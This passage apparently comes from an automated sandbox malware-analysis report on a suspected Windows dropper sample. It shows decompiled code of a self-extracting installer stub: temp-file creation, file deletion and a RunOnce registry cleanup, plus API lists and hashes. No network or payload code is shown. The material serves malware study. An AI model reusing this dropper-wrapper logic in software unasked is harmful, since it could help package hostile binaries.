                                                                                                                                                                                                        					if(0 != _t56) {
                                                                                                                                                                                                        						Sleep(0x3e8);
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t58 = 1;
                                                                                                                                                                                                        						_t53 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                        					_t67 =  *0xe888b0 - _t58; // 0x2
                                                                                                                                                                                                        					if(_t67 != 0) {
                                                                                                                                                                                                        						__eflags =  *0xe888b0; // 0x2
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							 *0xe881e4 = _t58;
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *0xe888b0 = _t58;
                                                                                                                                                                                                        							_t37 = E00E86C3F(0xe810b8, 0xe810c4); // executed
                                                                                                                                                                                                        							__eflags = _t37;
                                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                                        								goto L13;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                        								_t30 = 0xff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(0x1f);
                                                                                                                                                                                                        						L00E86FF4();
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						_t68 =  *0xe888b0 - _t58; // 0x2
                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                        							_push(0xe810b4);
                                                                                                                                                                                                        							_push(0xe810ac);
                                                                                                                                                                                                        							L00E87202();
                                                                                                                                                                                                        							 *0xe888b0 = 2;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(_t53 == 0) {
                                                                                                                                                                                                        							 *0xe888ac = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t71 =  *0xe888b4;
                                                                                                                                                                                                        						if( *0xe888b4 != 0 && E00E87060(_t71, 0xe888b4) != 0) {
                                                                                                                                                                                                        							_t60 =  *0xe888b4; // 0x0
                                                                                                                                                                                                        							 *0xe8a288(0, 2, 0);
                                                                                                                                                                                                        							 *_t60();
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t25 = __imp___acmdln; // 0x76235b9c
                                                                                                                                                                                                        						_t59 =  *_t25;
                                                                                                                                                                                                        						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							_t41 =  *_t59;
                                                                                                                                                                                                        							if(_t41 > 0x20) {
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							if(_t41 != 0) {
                                                                                                                                                                                                        								if(_t54 != 0) {
                                                                                                                                                                                                        									goto L32;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                        										_t59 = _t59 + 1;
                                                                                                                                                                                                        										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        										_t41 =  *_t59;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                        							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                        								_t29 = 0xa;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push(_t29);
                                                                                                                                                                                                        							_t30 = E00E82BFB(0xe80000, 0, _t59); // executed
                                                                                                                                                                                                        							 *0xe881e0 = _t30;
                                                                                                                                                                                                        							__eflags =  *0xe881f8;
                                                                                                                                                                                                        							if( *0xe881f8 == 0) {
                                                                                                                                                                                                        								exit(_t30); // executed
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags =  *0xe881e4;
                                                                                                                                                                                                        							if( *0xe881e4 == 0) {
                                                                                                                                                                                                        								__imp___cexit();
                                                                                                                                                                                                        								_t30 =  *0xe881e0; // 0x80070002
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                        							goto L40;
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							__eflags = _t41 - 0x22;
                                                                                                                                                                                                        							if(_t41 == 0x22) {
                                                                                                                                                                                                        								__eflags = _t54;
                                                                                                                                                                                                        								_t15 = _t54 == 0;
                                                                                                                                                                                                        								__eflags = _t15;
                                                                                                                                                                                                        								_t54 = 0 | _t15;
                                                                                                                                                                                                        								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                        							__imp___ismbblead(_t26);
                                                                                                                                                                                                        							__eflags = _t26;
                                                                                                                                                                                                        							if(_t26 != 0) {
                                                                                                                                                                                                        								_t59 = _t59 + 1;
                                                                                                                                                                                                        								__eflags = _t59;
                                                                                                                                                                                                        								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t59 = _t59 + 1;
                                                                                                                                                                                                        							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L40:
                                                                                                                                                                                                        					return E00E8724D(_t30);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t58 = 1;
                                                                                                                                                                                                        				__eflags = 1;
                                                                                                                                                                                                        				goto L7;
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x00e86c3e
                                                                                                                                                                                                        0x00e86abe
                                                                                                                                                                                                        0x00e86abe
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00E87155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00E87182
                                                                                                                                                                                                          • Part of subcall function 00E87155: GetCurrentProcessId.KERNEL32 ref: 00E87191
                                                                                                                                                                                                          • Part of subcall function 00E87155: GetCurrentThreadId.KERNEL32 ref: 00E8719A
                                                                                                                                                                                                          • Part of subcall function 00E87155: GetTickCount.KERNEL32 ref: 00E871A3
                                                                                                                                                                                                          • Part of subcall function 00E87155: QueryPerformanceCounter.KERNEL32(?), ref: 00E871B8
                                                                                                                                                                                                        • GetStartupInfoW.KERNEL32(?,00E872B8,00000058), ref: 00E86A7F
                                                                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00E86AB4
                                                                                                                                                                                                        • _amsg_exit.MSVCRT ref: 00E86AC9
                                                                                                                                                                                                        • _initterm.MSVCRT ref: 00E86B1D
                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00E86B49
                                                                                                                                                                                                        • exit.KERNELBASE ref: 00E86BBF
                                                                                                                                                                                                        • _ismbblead.MSVCRT ref: 00E86BDA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836923961-0
                                                                                                                                                                                                        • Opcode ID: 162b4df70c2394242876d4c37512d87094823a819d4d4faccc4f12ece01fecae
                                                                                                                                                                                                        • Instruction ID: 3ea3d7a79c632b017dc4fafc7ce3e674905a60f334d0060eaeee25a8fde97116
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 162b4df70c2394242876d4c37512d87094823a819d4d4faccc4f12ece01fecae
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 55411570944324CFDB25BB65DD097AA77E4EB44728FA4212AE84DF32A0CF708C458B81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 631 e858c8-e858d5 632 e858d8-e858dd 631->632 632->632 633 e858df-e858f1 LocalAlloc 632->633 634 e85919-e85959 call e81680 call e8658a CreateFileA LocalFree 633->634 635 e858f3-e85901 call e844b9 633->635 638 e85906-e85910 call e86285 634->638 644 e8595b-e8596c CloseHandle GetFileAttributesA 634->644 635->638 645 e85912-e85918 638->645 644->638 646 e8596e-e85970 644->646 646->638 647 e85972-e8597b 646->647 647->645
                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00E858C8(intOrPtr* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				signed char _t16;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				intOrPtr* _t27;
                                                                                                                                                                                                        				CHAR* _t33;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                                        				_t27 = __ecx;
                                                                                                                                                                                                        				_t23 = __ecx + 1;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t6 =  *_t27;
                                                                                                                                                                                                        					_t27 = _t27 + 1;
                                                                                                                                                                                                        				} while (_t6 != 0);
                                                                                                                                                                                                        				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                        				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                        				if(_t20 != 0) {
                                                                                                                                                                                                        					E00E81680(_t20, _t36, _t33);
                                                                                                                                                                                                        					E00E8658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                        					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                        					_v8 = _t10;
                                                                                                                                                                                                        					LocalFree(_t20);
                                                                                                                                                                                                        					_t12 = _v8;
                                                                                                                                                                                                        					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						CloseHandle(_t12);
                                                                                                                                                                                                        						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                        						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *0xe89124 = 0;
                                                                                                                                                                                                        							_t14 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00E844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					 *0xe89124 = E00E86285();
                                                                                                                                                                                                        					_t14 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t14;
                                                                                                                                                                                                        			}














                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00E85534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E858E7
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00E85534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E85943
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00E85534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E8594D
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00E85534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E8595C
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00E85534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E85963
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
• Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                                                                                                                        • API String ID: 747627703-1664176527
                                                                                                                                                                                                        • Opcode ID: 4681dcac64904ce9ff416c0e969ca83cee1ccaab67aed56841a59981fae0cf9d
                                                                                                                                                                                                        • Instruction ID: 84c7e0ff842d5f0adff59d72025d1da681cbd4fddeef82253992ef301ecb3226
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4681dcac64904ce9ff416c0e969ca83cee1ccaab67aed56841a59981fae0cf9d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A1156726012106BD7207FBA6C4CAAB7E9DDF86364B141626F51DF31C1CE74880A83A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E851E5(void* __eflags) {
                                                                                                                                                                                                        				int _t5;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = E00E8468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                        				if(_t28 != 0) {
                                                                                                                                                                                                        					if(E00E8468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                        						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                        						if(_t5 != 0) {
                                                                                                                                                                                                        							_t6 = E00E844B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                        							LocalFree(_t28);
                                                                                                                                                                                                        							if(_t6 != 6) {
                                                                                                                                                                                                        								 *0xe89124 = 0x800704c7;
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								return 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *0xe89124 = 0;
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						LocalFree(_t28);
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					E00E844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					LocalFree(_t28);
                                                                                                                                                                                                        					 *0xe89124 = 0x80070714;
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00E844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        				 *0xe89124 = E00E86285();
                                                                                                                                                                                                        				goto L10;
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846A0
                                                                                                                                                                                                          • Part of subcall function 00E8468F: SizeofResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846A9
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846C3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LoadResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846CC
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LockResource.KERNEL32(00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846D3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: memcpy_s.MSVCRT ref: 00E846E5
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00E82F4D,?,00000002,00000000), ref: 00E85201
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00E85250
                                                                                                                                                                                                          • Part of subcall function 00E844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E84518
                                                                                                                                                                                                          • Part of subcall function 00E844B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E84554
                                                                                                                                                                                                          • Part of subcall function 00E86285: GetLastError.KERNEL32(00E85BBC), ref: 00E86285
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
• Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$UPROMPT
                                                                                                                                                                                                        • API String ID: 957408736-2980973527
                                                                                                                                                                                                        • Opcode ID: 46df5d5013d633d3a05103244814c358e15a048cce36eed558a69ab21a341e27
                                                                                                                                                                                                        • Instruction ID: 7f3358726c9ab19cea4b929dfd24ac4ce688804b864e1e48438091cd6660ddec
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46df5d5013d633d3a05103244814c358e15a048cce36eed558a69ab21a341e27
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3411E6B2641201AFE3157BB25C89B3B61EDDBC8354B15543AB60EF51E0DE789C015325
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                                                        			E00E852B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				CHAR** _t31;
                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t28 = __edi;
                                                                                                                                                                                                        				_t22 = __ecx;
                                                                                                                                                                                                        				_t21 = __ebx;
                                                                                                                                                                                                        				_t9 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                        				_push(__esi);
                                                                                                                                                                                                        				_t31 =  *0xe891e0; // 0x688290
                                                                                                                                                                                                        				if(_t31 != 0) {
                                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t29 = _t31;
                                                                                                                                                                                                        						if( *0xe88a24 == 0 &&  *0xe89a30 == 0) {
                                                                                                                                                                                                        							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                        							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t31 = _t31[1];
                                                                                                                                                                                                        						LocalFree( *_t29);
                                                                                                                                                                                                        						LocalFree(_t29);
                                                                                                                                                                                                        					} while (_t31 != 0);
                                                                                                                                                                                                        					_pop(_t28);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 =  *0xe88a20; // 0x0
                                                                                                                                                                                                        				_pop(_t32);
                                                                                                                                                                                                        				if(_t11 != 0 &&  *0xe88a24 == 0 &&  *0xe89a30 == 0) {
                                                                                                                                                                                                        					_push(_t22);
                                                                                                                                                                                                        					E00E81781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                        					if(( *0xe89a34 & 0x00000020) != 0) {
                                                                                                                                                                                                        						E00E865E8( &_v268);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                        					_t22 =  &_v268;
                                                                                                                                                                                                        					E00E82390( &_v268);
                                                                                                                                                                                                        					_t11 =  *0xe88a20; // 0x0
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *0xe89a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                        					_t11 = E00E81FE1(_t22); // executed
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *0xe88a20 =  *0xe88a20 & 0x00000000;
                                                                                                                                                                                                        				return E00E86CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(00688290,00000080,?,00000000), ref: 00E852F2
                                                                                                                                                                                                        • DeleteFileA.KERNELBASE(00688290), ref: 00E852FA
                                                                                                                                                                                                        • LocalFree.KERNEL32(00688290,?,00000000), ref: 00E85305
                                                                                                                                                                                                        • LocalFree.KERNEL32(00688290), ref: 00E8530C
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(00E811FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E85363
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00E85334
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                        • API String ID: 2833751637-305352358
                                                                                                                                                                                                        • Opcode ID: 7f509d5db8fcba70bbcd1f1c6824cd6f58a73a988785d942cb6e94a16ce807f4
                                                                                                                                                                                                        • Instruction ID: 4b8d3cd268664467a2f0f7a0e5bc983c540a8a332824182aee2dd1bf2b54411e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f509d5db8fcba70bbcd1f1c6824cd6f58a73a988785d942cb6e94a16ce807f4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA21F332901A04DFDB38BF21DD49B6977B4BB00744F4821AAE84E761A5CFB05C8CCB40
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E81FE1(void* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				if( *0xe88530 != 0) {
                                                                                                                                                                                                        					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                        					if(_t4 == 0) {
                                                                                                                                                                                                        						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                                                                                                                                                                        						return RegCloseKey(_v8);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00E8538C,?,?,00E8538C), ref: 00E82005
                                                                                                                                                                                                        • RegDeleteValueA.KERNELBASE(00E8538C,wextract_cleanup0,?,?,00E8538C), ref: 00E82017
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00E8538C,?,?,00E8538C), ref: 00E82020
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                        • API String ID: 849931509-702805525
                                                                                                                                                                                                        • Opcode ID: 424b1a6fc58d257fdc0f7494b0d6d36ae430113c13e81eaa2859e7f961501f3a
                                                                                                                                                                                                        • Instruction ID: 13dc5e2feca0eef793e60949918e86bcf77844a57f70d9bf06356bd506348fab
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 424b1a6fc58d257fdc0f7494b0d6d36ae430113c13e81eaa2859e7f961501f3a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8E04F30950318BFE722ABD2ED0AF597B6AE701745F6401A9BE0CB0070EB615A18D705
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00E84CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				long _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				long _t35;
                                                                                                                                                                                                        				long _t36;
                                                                                                                                                                                                        				struct HWND__* _t37;
                                                                                                                                                                                                        				long _t38;
                                                                                                                                                                                                        				long _t39;
                                                                                                                                                                                                        				long _t41;
                                                                                                                                                                                                        				long _t44;
